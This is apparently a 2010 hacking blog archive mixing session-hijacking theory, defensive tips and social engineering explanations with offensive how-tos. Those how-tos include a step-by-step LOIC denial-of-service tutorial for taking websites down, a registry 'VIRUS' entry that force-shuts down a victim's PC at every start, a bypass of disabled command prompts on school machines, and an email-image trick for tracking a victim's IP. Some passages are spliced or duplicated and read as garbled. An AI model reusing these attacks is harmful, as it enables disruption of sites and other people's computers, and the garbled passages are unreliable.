Wednesday, March 31, 2010

Protecting against Session Hijacking

  1. Use Encryption

  2. Use a secure protocol

  3. Limit incoming connections

  4. Minimize remote access

  5. Have strong authentication.
When practical, limit successful sessions to specific IP addresses. This usually only works when dealing within an intranet setting, where the IP ranges are predictable and finite.

Re-authenticate the user before critical actions are performed. If possible, try to limit unique session tokens to each browser instance (e.g. generate the token with a hash of the MAC address of the computer and process id of the browser, etc.) Configure the appropriate spoof rules on gateways (internal and external). Monitor for ARP cache poisoning, by using IDS products or ARPwatch.

Use x.509 certificates to prevent more traditional types of TCP hijacking.

Use encryption. This can be done by one or more of the following.

  • Forcing all incoming connections from the outside world to be fully encrypted.

  • Forcing all connections to critical machines to be fully encrypted.

  • Forcing all traffic on the network to be encrypted.

  • Using encrypted protocols, like those found in the OpenSSH suite. The OpenSSH suite includes the ssh program which replaces rlogin and telnet, scp which replaces rcp, and sftp which replaces ftp. Also included is sshd which is the server side of the package, and the other basic utilities like ssh-add, ssh-agent, ssh-keygen and sftp-server.

Use strong authentication (like Kerberos) or peer-to-peer VPN's.

Remote TCP Session Reset Utility

This security tool can remotely display all active sessions on a terminal server, router, dial-in server, access server, etc. The user can reset any TCP session remotely.
Resetting a connection is simple.

  1. Start up the remote TCP session reset

  2. Enter the IP address of the machine whose connection is to be reset.

  3. Enter the read-write community string.

  4. Click on connect to retrieve a list of active TCP connections

  5. Click on the connection that is to be disconnected, and select 'Break' from the toolbar.

Programs that perform Session Hijacking

Programs that perform Session Hijacking

  • There are several programs available that perform session hijacking. Following are a few that belongs to this category:

    • Juggernaut

    • Hunt

    • TTY Watcher

    • IP Watcher

    • T-Sight
There are few programs/source codes available for doing a TCP hijack.

  • Juggernaut

  • TTY Watcher

  • IP Watcher

  • T-Sight

  • Hunt
Hacking Tool: Juggernaut

  • Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux Operating systems.

  • Juggernaut can be set to watch for all network traffic or it can be given a keyword like password to look out for.

  • The main function of this program is to maintain information about various session connections that are occurring on the network.

  • The attacker can see all the

    Juggernaut is basically a network sniffer that can also be used to hijack TCP sessions. It runs on Linux and has a Trinux module as well. Juggernaut can be activated to watch all network traffic on the local network.
    For example, Juggernaut can be configured to wait for the login prompt, and then record the network traffic that follows (usually capturing the password). By doing so, this tool can be used to capture certain types of traffic by simply leaving the tool running for a few days, and then the attacker just has to pick up the log file that contains the recorded traffic. This is different than regular network sniffers that record all network traffic making the log files extremely huge (and thus easy to detect).
    However, the main feature of this program is its ability to maintain a connection database. This means an attacker can watch all the TCP based connection made on the local network, and possibly "hijack" the session. After the connection is made, the attacker can watch the entire session (for a telnet session, this means the attacker sees the "playback" of the entire session. This is like actually seeing the telnet window).
    When an active session is watched, the attacker can perform some actions on that connection, besides passively watching it. Juggernaut is capable of resetting the connection (which basically means terminating it), and also hijacking the connection, allowing the attacker to insert commands in the session or even to completely take the session into his hands (resetting connection on the legitimate client). sessions and he can pick a session he wants to hijack.

Tuesday, March 30, 2010

Sequence Numbers - crucial to hijacking a session

Sequence Numbers

  • Sequence Numbers are very important to provide reliable communication but they are also crucial to hijacking a session.

  • Sequence numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations.

  • The sequence numbers are used to tell the receiving machine what order the packets should go in when they are received.

  • Therefore an attacker must successfully guess the sequence number to hijack a session.
TCP provides a full duplex reliable stream connection between two end points. A connection is uniquely defined by the IP address of sender, TCP port number of the sender, IP address of the receiver and TCP port number of the receiver.
Every byte that is sent by a host is marked with a sequence number and is acknowledged by the receiver using this sequence number. The sequence number for the first byte sent is computed during the connection opening. It changes for any new connection based on rules designed to avoid reuse of the same sequence number for two different sessions of a TCP connection.
We have sent the increment of sequence number in our discussion of the three way handshake. What happens if the sequence number is predictable? When the TCP sequence is predictable, an attacker can send packets that are forged to appear to come from a trusted computer.
The next step taken was to tighten the OS implementation of TCP and introduce randomness in the ISN. This was done by the use of pseudo-random number generators (PRNGs). PRNGs introduced some randomness when producing ISNs used in TCP connections. However, adding a series of numbers together provided insufficient variance in the range of likely ISN values; thereby allowing an attacker to disrupt or hijack existing TCP connections or spoof future connections against vulnerable TCP/IP stack implementations.
This implied that systems relying on random increments to make ISN numbers harder to guess were still vulnerable to statistical attack. In other words, with the passage of time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm that is used by a particular operating system. Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible.

If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number, he can send a simple packet to inject data or kill the session if he is aware of the number of bytes transmitted in the session this far.
As this is a difficult proposition, the attacker can guess a suitable range of sequence numbers and send out a number of packets into the network with different sequence numbers - but falling within the range. Since the range is known, it is likely that at least one packet will be accepted by the server. This way, the attacker need not send a packet for every sequence number, but resort to sending an appropriate number of packets with sequence numbers a window-size apart. But how does he know how many packets are to be sent?
This is obtained by dividing the range of sequence numbers to be covered by the fraction of the window size that is used as an increment. Why was this possible despite the introduction of PRNGs? The problem lay in the use of increments themselves, random or otherwise, to advance an ISN counter, making statistical guessing practical. The result of this is that remote attackers can perform session hijacking or disruption by injecting a flood of packets with a range of ISN values, one of which may match the expected ISN. The more random the ISNs are, the more difficult it is to carry out these attacks.

Monday, March 29, 2010

Hack a website with denial of service attack

Now i will show you how to hack a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.

Step 1: Type the target URL in the URL box.

Step 2: Click lock on.

Step 3: Change the threads to 9001 for maximum efficiency.

Step 4: Click the big button "

Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!


learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too

3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-Cursor group;
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.

5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.

TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

Yahoo Messenger multiple logins

Yahoo Messenger trick-How to open Multiple Yahoo Messenger???

1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a windown named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registery editor window
13. Now you can launch multiple windows and use different ID's

shutdown your friend's computer everytime it start:

Thats really easy.
put this followin text in a .reg file and run it in the victims pc:

Windows Registry Editor Version 5.00

"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

You can also put this in a javascript code, just add this code to your webpage:

Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.

 well i am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here.


Types of session Hijacking

There are two types of hijacking attacks:

  1. Active
    In an active attack, an attacker finds an active session and takes over.

  2. Passive
    With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.
Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session.
Generally a passive attack uses sniffers on the network allowing the attacker to obtain information such as user id and password so that he can use it later to logon as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed when raw access to a network is obtained. Counters against this attack range from using identification schemes such as one-time password (e.g. skey) to ticketing identification (such as Kerberos). While these may keep sniffing from yielding any productive results, they do not insure the network from an active attack neither as long as the data is neither digitally signed nor encrypted.
In an active attack, the attacker takes over an existing session by either tearing down the connection on one side of the conversation or by actively participating by being the man-in-the-middle. These have been discussed at length under the discussion covering the various steps involved in a session hijack.
This requires the ability to predict the sequence number before the target can respond to the server. Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number.

Steps in Session Hijacking

  1. Tracking the session

  2. Desynchronizing the connection

  3. Injecting the attacker's packet
How does an attacker go about hijacking a session? The hijack can be broken down into four broad phases.

  • Tracking the connection
    The attacker will wait to find a suitable target and host. He use a network sniffer to track the victim and host or identify a suitable user by scanning with a scanning tool such as nmap to find a target with a trivial TCP sequence prediction. This is done to ensure that because the correct sequence and acknowledgement numbers are captured, as packets are checked by TCP through sequence and/or acknowledgement numbers. These will later be used by the attacker in crafting his own packets.

  • Desynchronizing the connection
    A desynchronized state is when a connection between the target and host is in the established state; or in a stable state with no data transmission; or the server's sequence number is not equal to the client's acknowledgement number; or the clients sequence number is not equal to the server's acknowledgement number. To desynchronize the connection between the target and host, the sequence number or the acknowledgement number (SEQ/ACK) of the server must be changed. This can be done if null data is sent to the server so that the server's SEQ/ACK numbers will advance; while the target machine will not register such an increment.
    The desynchronizing is preceded by the attacker monitoring the session without interference till an opportune moment, when he will send a large amount of " null data" to the server. This data serves only to change the ACK number on the server and does not affect anything else. The attacker does likewise to the target also. Now both the server and target are desynchronized.

  • Resetting the connection
    Another approach is to send a reset flag to the server and tearing down the connection on the server side. This is ideally done in the early setup stage. The goal of the attacker is to break the connection on the server side and create a new one with different sequence number.
    The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with exactly the same parameters such as port number but a different sequence number. The server on receiving the RST packet, closes connection with the target, but initiates another one based on the SYN packet - with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now, the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in desynchronized but established state.
    This can also be done using a FIN flag, but this will cause the server to respond with an ACK and give away the attack through an ACK storm. This results due to a flaw in this method of hijacking a TCP connection. When receiving an unacceptable packet the host acknowledges it by sending the expected sequence number and using its own sequence number. This packet is itself unacceptable and will generate an acknowledgement packet which in turn will generate an acknowledgement packet, thereby creating a supposedly endless loop for every data packet sent. The mismatch in SEQ/ACK numbers results in excess network traffic with both the server and target trying to verify the right sequence. Since these packets do not carry data they are not retransmitted if the packet is lost. However, since TCP uses IP the loss of a single packet puts an end to the unwanted conversation between the server and target on the network.
    The desynchronizing stage is added in the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity by spoofing an IP address. However, he will have to put up with the server's response being relayed to the target host as well.

  • Injecting the attacker's packet
    Now that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa, reading and injecting data as he sees fit.

  1. Alice opens a telnet session to Bob and starts doing some work.

  2. Eve observes the connection between Alice and Bob using a sniffer that is integrated into her hijacking tool. Eve makes a note of Alice's IP address and her hijacking software samples the TCP sequence numbers of the connection between Alice and Bob.

  3. Eve launches a DoS attack against Alice to stop Alice doing further work on Bob and to prevent an ACK storm from interfering with her attack.

  4. Eve generates spoofed packets with the correct TCP sequence numbers and connects to Bob.

  5. Bob thinks that he is still connected to Alice.

  6. Alice notices a lack of response from Bob and blames it on the network.

  7. Eve finds herself at a root prompt on Bob. She issues some commands to make a backdoor and uses the sniffer to observe the responses from Bob.

  8. After covering her tracks, Eve logs out of Bob and ceases the DoS attack against Alice.

  9. Alice notices that her connection to Bob has been dropped.

  10. Eve uses her backdoor to get directly into Bob.

Spoofing Vs Hijacking

A spoofing attack is different from a hijack in that an attacker is not actively taking another user offline to perform the attack. he pretends to be another user or machine to gain access.

The early record of a session hijacking is perhaps the Morris Worm episode that affected nearly 6000 computers on the ARPANET in 1988. This was ARPANET's first automated network security incident. Robert T. Morris wrote a program that would connect to another computer, find and use one of several vulnerabilities to copy itself to that second computer, and begin to run the copy of itself at the new location. Both the original code and the copy would then repeat these actions in an infinite loop to other computers on the ARPANET.
Though this has found reference time and again in the context of worms and denial of service, the basic working of the Morris worm was based on the discovery that the security of a TCP/IP connection rested in the sequence numbers and that it was possible to predict them
Blind IP spoofing involves predicting the sequence numbers that the victimized host will send in order to create a connection which appears to originate from the host. Before exploring blind spoofing further, let us take a look at sequence number prediction.
TCP sequence numbers are used to provide flow control and data integrity for TCP sessions. Every byte in a TCP session has a unique sequence number. Moreover, every TCP segment provides the sequence number of the initial byte (ISN), as part of the segment header. The initial sequence number does not start at zero for each session. Instead, the participants specify initial sequence numbers as part of the handshake process-a different ISN for each direction-and begin numbering the bytes sequentially from there.
Blind IP spoofing relies on the attacker's ability to predict sequence numbers as he is unable to sniff the communication between the two hosts by virtue of not being on the same network segment. He cannot spoof a trusted host on a different network and see the reply packets because the packets are not routed back to him. He cannot resort to ARP cache poisoning as well because routers do not route ARP broadcasts across the Internet. As he is not able to see the replies he is forced to anticipate the responses from the victim and prevent the host from sending a RST to the victim. The attacker then injects himself into the communication by predicting what sequence number the remote host is expecting from the victim. This is used extensively to exploit the trust relationships between users and remote machines, these services include NFS, telnet, IRC, etc.
IP spoofing is relatively easy to accomplish. The only pre-requisite on part of the attacker is to have root access on a machine in order to create raw packets. In order to establish a spoofed connection the attacker must know what sequence numbers are being used. Therefore, IP spoofing forces the attacker to have to predict the next sequence number.
The attacker can use "blind" hijacking, to send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net. The attack became famous when Kevin Mitnick used it to hack into Tsutomu Shimomura's computer network. The attack exploited the trust that Shimomura's machines had with the other network. By SYN flooding the trusted host, Mitnick was able to establish a short connection which was then used to gain access through traditional methods.
With Hijacking an attacker is taking over an existing session, which means he is relying on the legitimate user to make a connection and authenticate. Then take over the session.
With IP Spoofing there is no need to guess the sequence number since there is no session currently open with that IP address. The traffic would get back to the attacker only by using source routing. This is where the attacker tells the network how to route the output and input from a session, and he simply sniffs it from the network as it passes by him. Source routing is an IP option used today mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration. Source routing provides a means to override the control of the routers.
When an attacker uses captured, reverse engineered or brute forced authentication tokens to take over the control of a legitimate user's session while he is in session, the session is said to be hijacked. Due to this attack, the legitimate user may loose access or be deprived of the normal functionality of the session to the attacker, who now acts with the user's privileges.
Most authentications occur at the beginning of a TCP session, this makes it possible for the attacker to gain access to a target machine. A popular method attackers adopt is to use source-routed IP packets. This allows an attacker to become a part of the target - host conversation by deceiving the IP packets to pass through his system. The attacker can also carry out the classic man-in-the-middle attack using a sniffing program to monitor the conversation.
In TCP session hijacking, a familiar aspect of the attacks is the carrying out of a denial-of-service (DoS) attack against the target / host to prevent it from responding by either forcing the machine to crash, or against the network connection to result in a heavy packet loss (e.g. SYN flood).
Session hijacking is even more difficult than IP address spoofing. In session hijacking, John would seek to insert himself into a session that Jane already had set up with \\Mail. John would wait until Jane established a session, then knock her off the air by some means and pick up the session as though he was her. As before, John would send a scripted set of packets to \\Mail but would not be able to see the responses. To do this, he would need to know the sequence number in use when he hijacked the session, which could be calculated knowing the ISN and the number of packets that have been exchanged.
Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. Knowledge of the ISN would be the least of John's challenges. For instance, he would need a way to knock Jane off the air at will. He also would need a way to know the exact status of Jane's session at the moment he mounted his attack. Both of these require that John have far more knowledge about and control over the session than normally would be possible.
However, IP address spoofing attacks can only be successful if IP addresses are used for authentication. An attacker cannot perform IP address spoofing or session hijacking if per-packet integrity checking is executed. Similarly, neither IP address spoofing nor session hijacking are possible if the session uses encryption such as SSL or PPTP, as the attacker will not be able to participate in the key exchange. Therefore the essential requirements to hijack non-encrypted TCP communications can be listed as: Presence of non-encrypted session oriented traffic, ability to recognize TCP sequence numbers and predict the next sequence number (NSN) and capability to spoof a hosts MAC or IP address to receive communications which are not destined for the attackers host. If the attacker is on the local segment, they can sniff and predict the ISN+1 number and have the traffic routed back to them by poisoning the ARP cache.

Sunday, March 28, 2010

Understanding session hijacking

  • Understanding the flow of message packets over the Internet by dissecting the TCP stack.

  • Understanding the security issues involved in the use of IPv4 standard

  • Familiarizing with the basic attacks possible due to the IPv4 standard.

  • At its simplest level, TCP hijacking relies on the violation of trust relationships between two interacting hosts. Before we go into the details of session hijacking, let us take a look at the TCP stack and the IPv4 protocol, to understand why this attack is possible.
    Consider the everyday scenario when you access the Internet with your browser - say IE. IE works at the application layer and accepts the initial datagram to be sent across the Internet. The transport protocol comes into action in the next layer - aptly called the transport layer - and the appropriate protocol header is added to the datagram. Here it is TCP header, as it is the TCP protocol that is being used. This ensures the reliability of data transported over inherently unreliable communication platforms, and also controls many of the aspects in the management and initiation of communication between the two hosts. In the network layer, routers offer the functionality for the datagram to hop from source to the destination, one hop at a time. This also sees the IP header being added to the datagram. The final layer that communicated with the physical hardware is the data link layer. This layer is responsible for the delivery of signals from the source to the destination over a physical communication platform, which in this case is the Ethernet.
    Now, the headers are peeled back on reaching the destination to reveal the original datagram. Having understood the TCP stack, let us look at IPv4. The original IPv4 standard needed to address three basic security issues - authentication, integrity and privacy. Authentication was an issue because an attacker could easily spoof an IP address and exploit a session. Spoofing was not restricted to IP address alone, but also extended to MAC addresses in ARP spoofing. An attacker sniffing on a network could sniff packets and carry out simple attacks such as change, delete, reroute, add, forge or divert data. Perhaps the most popular among these attacks is the Man-In-the-Middle attack. An attacker can grab unencrypted traffic from a victim's network-based TCP application, further tampering with the authenticity and integrity of the data before forwarding it on to the unsuspecting target.

    Saturday, March 27, 2010

    Enumerate User Information

    Enumerate User Information from Target: USERDUMP

    The USERDUMP application is designed to gather user information from the target. Some of the information enumerated is the user RID, privileges, login times, login dates, account expiration date, network storage limitations, login hours, and much more.

    From a DOS prompt type the following syntax:

    userdump \\Target IP Address Target Username

    The results reveal the following username Administrator details:
    The User ID is 500. (This tells us that this is indeed the real Administrator account.)
    The user’s password never expires.
    The Administrator last logged in at 12:44 a.m. on January 16, 2004.
    The account has had 9 bad password attempts.
    The Administrator has only logged in to this computer 2 times.
    The PasswordExp is set to 0. (This tell us that the password never expires.)
    The logon hours are all set to 1. (This tells us that the Administrator can log
    in 24/7.)
    Other information.

    The username Administrator details have been successfully enumerated via the USERDUMP application.

    Exploit Data from Target Computer: USERINFO

    The USERINFO application is designed to gather user information from the target. Some of the information enumerated is the user RID, privileges, login times, login dates, account expiration date, network storage limitations, login hours, and much more. An attacker uses this information in his or her social engineering phase of an attack.

    From a Disc Operating System (DOS) prompt type the following syntax:

    userinfo \\Target IP Address Target Username

    Notice the results returned with USERINFO are identical to the USERDUMP application

    Social Engineering Techniques: Dumpster Diving

    Information that companies consider sensitive is thrown out daily in the normal garbage cans. Attackers can successfully retrieve this data by literally climbing into the company dumpsters and pilfering through the garbage. Information such as names, Social Security numbers,
    addresses, phone numbers, account numbers, balances, and so forth is thrown out every day somewhere. I personally know a nationally recognized movie rental company that still uses carbon paper in its fax machine. Once the roll is used up they simply throw the entire
    roll in the dumpster. The information on that roll is priceless, including names, addresses, account numbers, phone numbers, how much they actually pay for their movies, and so forth.

    Another social engineering attack that also proves to be very successful is when an attacker dresses in the uniform of those personnel considered “honest” and “important” or even “expensive.” For example; an attacker purchases/steals the uniform of a carrier, telephone, or gas or electric employee and appears carrying boxes and/or clipboards, pens, tools,
    etc. and perhaps even an “official-looking” identification badge or a dolly carrying “equipment.” These attackers generally have unchallenged access throughout the building as employees tend to see “through” these types of people. When is the last time you challenged
    one of these personnel to verify their credentials?

    This attack is very risky as the attacker can now be personally identified should he or she get caught. Again, this attack is normally very successful so bear this in mind.

    Common Types of Social Engineering

    Social Engineering can be broken into two types: human based and computer based

    1. Human-based Social Engineering refers to person to person interaction to retrieve the desired information.

    2. Computer based Social Engineering refers to having computer software that attempts to retrieve the desired information
    Human based social engineering involves human interaction in one manner or the other. Computer based engineering depend on software to carry out the task at hand.
    Gartner Group notes six human behaviors for positive response for social engineering. Corroborate this with the traits discussed in module one of the course.
    Someone is given a "token" and feels compelled to take action.
    You buy the wheel of cheese when given a free sample.
    Certain behavior patterns are consistent from person to person.
    If you ask a question and wait, people will be compelled to fill the pause.
    Social Validation
    Someone is compelled to do what everyone else is doing.
    Stop in the middle of a busy street and look up; people will eventually stop and do the same.
    People tend to say yes to those they like, and also to attractive people.
    Attractive models are used in advertising.
    People tend to listen and heed the advice of those in a position of authority.
    "Four out of five doctors recommend...."
    If someone is in low supply, it becomes more "precious" and, therefore, more appealing.
    Furbees or Sony Playstation 2.
    Source: Gartner Research

    Friday, March 26, 2010

    Know Someone’s IP & Location via Email

    Getting someone’s IP Address or location was never so easy!
    There’s a site which allows you to know the IP, Location, etc… of a person just by sending an email. The site is , which is actually meant for tracking emails but it can be used for getting such info also :P
    For doing all this, you just need to attach an image provided by SpyPig. If you want, you can also use your images by making an ID @ .
    To make the SpyPig image work, the victim must enable images in emails (which is usually disabled by default!). To make my victim do this, I made an ID at and added some wallpapers, and used them as SpyPig images and requested my victim to Enable images to view the wallpapers…

    USB flash drive portable browsers

    flashdriveHave you ever been some place other than your home on your computer? If your answer is anything other then yes, you need to stop being a computer hugging hippy and go outside, get a whif of some fresh air, step on some dog crap and accidently run over a cat. It’ll do you some good. Anyways, have you visited someone somewhere and while using his/her/its computer, you realized you didn’t know a password because it was saved on your browser, or you wanted to show your friend that one cool website with the non-Asian ninjas, but it was in your bookmarks, or you wanted to use an extension you had installed on your browser that got rid of homosexual ads? Well you can. It’s called portable browsers, a.k.a a browser on your USB drive.

    If you use Mozilla Firefox, which I highly recommend, you can download the portable browser hiya: I’m a link.

    If you’re an apple fanboy or just like safari, you can download it’s portable version hiya: I’m a link too.

    If you use Internet Explorer, you must have some sort of brain blockage and need to fall off a cliff.

    Some great features of these portable browsers are:

    • you can take your bookmarks with you
    • although probably not a good idea, for those of you that happen to always kill the braincells holding your passwords, you can take the saved one’s with you
    • take all your extensions with you
    • keeps your information stored on the flash drive instead of the computer you are using

    How to get command prompt

    In many public places like schools and libraries, the system administrators disable CMD.EXE but forget about the older version, COMMAND.COM. When trying to access CMD.EXE, if you are displayed with the
     following message


    then you know it is disabled for your user level.

    To get a COMMAND.COM prompt up, open Notepad.exe and type in “” without the quotes. Next, save it as a batch file via the “.bat” extention. So save it as “anything.bat” . Now once you double click this file, you should get a functional command prompt if it isn’t disabled.

    Social Engineering: Art of Manipulation


    • What is Social Engineering?

    • Common Types of Attacks

    • Social Engineering by Phone

    • Dumpster Diving

    • Online Social Engineering

    • Reverse Social Engineering

    • Policies and Procedures

    • Employee Education
    What is Social Engineering?

    • Social Engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action.

    • Companies with authentication processes, firewalls, virtual private networks and network monitoring software are still wide open to attacks

    • An employee may unwittingly give away key information in an email or by answering questions over the phone with someone they don't know or even by talking about a project with co workers at a local pub after hours.
    It is said that security is only as strong as the weakest link. Social engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action. It need not be restricted to corporate networks alone. It does not matter if enterprises have invested in high end infrastructure and security solutions such as complex authentication processes, firewalls, VPNs and network monitoring software. None of these devices or security measures is effective if an employee unwittingly gives away key information in an email, by answering questions over the phone with a stranger or new acquaintance or even brag about a project with coworkers at a local pub after hours.
    Most often, people are not even aware of the security lapse made by them, albeit inadvertently. Attackers take special interest in developing social engineering skills and can be so proficient that their victims would not even realize that they have been scammed. Despite having security policies in place within the organization, they are compromised because this aspect of attack preys on the human impulse to be kind and helpful.
    Attackers are always looking for new ways to access information. They will ensure that they know the perimeter and the people on the perimeter - security guards, receptionists and help desk workers - to exploit human oversight. People have been conditioned not to be overtly suspicious that, they associate certain behavior and appearance to known entities. For instance, on seeing a man dressed in brown and stacking a whole bunch of boxes in a cart, people will hold the door open because they think it is the delivery man.
    Some companies list employees by title and give their phone number and email address on the corporate Web site. Alternatively, a corporation may put advertisements in the paper for high-tech workers who trained on Oracle databases or UNIX servers. These little bits of information help Attackers know what kind of system they're tackling. This overlaps with the reconnaissance phase.
    Art of Manipulation.

    • Social Engineering includes acquisition of sensitive information or inappropriate access privileges by an outsider, based upon building of inappropriate trust relationships with outsiders.

    • The goal of a social engineer is to trick someone into providing valuable information or access to that information.

    • It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in trouble.
    Social engineering is the art and science of getting people to comply with an attacker's wishes. It is not a way of mind control, and it does not allow the attacker to get people to perform tasks wildly outside of their normal behavior. Above all, it is not foolproof. Yet, this is one way most Attackers get a foot into the corporation. There are two terms that are of interest here.

    • Social engineering is hacker jargon for getting needed information from a person rather than breaking into a system.

    • Psychological subversion is the term for using social engineering over an extended period of time to maintain a continuing stream of information and help from unsuspecting users.
    Let us look at a sample scenario.
    Attacker: "Good morning Ma'am, I am Bob; I would like to speak with Ms. Alice"
    Alice: "Hello, I am Alice"
    Attacker: "Good morning Ma'am, I am calling from the data center, I am sorry I am calling you so early..."
    Alice:" Uh, data center office, well, I was having breakfast, but it doesn't matter"
    Attacker: "I was able to call you because of the personal data form you filled when creating your account."
    Alice: "My pers.. oh, yes"
    Attacker: "I have to inform you that we had a mail server crash tonight, and we are trying to restore all corporate users' mail. Since you are a remote user, we are clearing your problems first."
    Alice: "A crash? Is my mail lost?"
    Attacker: "Oh no, Ma'am, we can restore it. But, since we are data center employees, and we are not allowed to mess with the corporate office user's mail, we need your password; otherwise we cannot take any action"(first try, probably unsuccessful)
    Alice: "Er, my password? Well..."
    Attacker: "Yes, I know, you have read on the license agreement that we will never ask for it, but it was written by the legal department, you know, all law stuff for compliance. (effort to gain victim's trust)
    Attacker: Your username is AliceDxb, isn't it? Corporate sys dept gave us your username and telephone, but, as smart as they are, not the password. See, without your password nobody can access your mail, even we at the datacenter. But we have to restore your mail, and we need access. You can be sure we will not use your password for anything else, well, we will forget it." (smiling )
    Alice: "Well, it's not so secret (also smiling! It's amazing...), my password is xxxxxx"
    Attacker: "Thank you very much, Ma'am. We will restore your mail in a few minutes" Alice: "But no mail is lost, is it?"
    Attacker: "Absolutely, Ma'am. You should not experience any problems, but do not hesitate to contact us just in case. You will find contact numbers on the Intranet"
    Alice: "Thanks"
    Attacker: "Goodbye"
    Human Weakness

    • People are usually the weakest link in the security chain.

    • A successful defense depends on having good policies in place and educating employees to follow the policies.

    • Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.
    Social engineering concentrates on the weakest link of the computer security chain. It is often said that the only secure computer is an unplugged one. The fact that you could persuade someone to plug it in and switch it on means that even powered down computers is vulnerable.
    Anyone with access to any part of the system, physically or electronically is a potential security risk. Any information that can be gained may be used for social engineering further information. This means even people not considered as part of a security policy can be used to cause a security breach. Security professionals are constantly being told that security through obscurity is very weak security. In the case of social engineering it is no security at all. It is impossible to obscure the fact that humans use the system or that they can influence it.
    Attempting to steer an individual towards completing a desired task can use several methods. The first and most obvious is simply a direct request, where an individual is asked to complete the task directly. Although difficult to succeed, this is the easiest method and the most straightforward. The individual knows exactly what is wanted of them. The second is by creating a contrived situation which the victim is simply a part of. With other factors than just the request to consider, the individual concerned is far more likely to be persuaded, because the attacker can create reasons for compliance other than simply personal ones. This involves far more work for the attacker, and almost certainly involves gaining extensive knowledge of the 'target'. This does not mean that situations do not have to be based in fact. The fewer untruths, the better the chances of success.
    One of the essential tools used for social engineering is a good memory for gathered facts. This is something that hackers and sysadmins tend to excel in, especially when it comes to facts relating to their field.

    Thursday, March 25, 2010

    Denial of Service attacks : Summary


    • Denial of Service is a very commonly used attack methodology.

    • Distributed Denial Of Service using a multiplicity of Zombie machines is an often seen attack methodology.

    • There are various tools available for attackers to perpetrate DOS attacks


    • Protection against DOS is difficult due to the very nature of the attacks.

    • Different scanning tools are available to aid detection and plugging of vulnerabilities leading to DOS

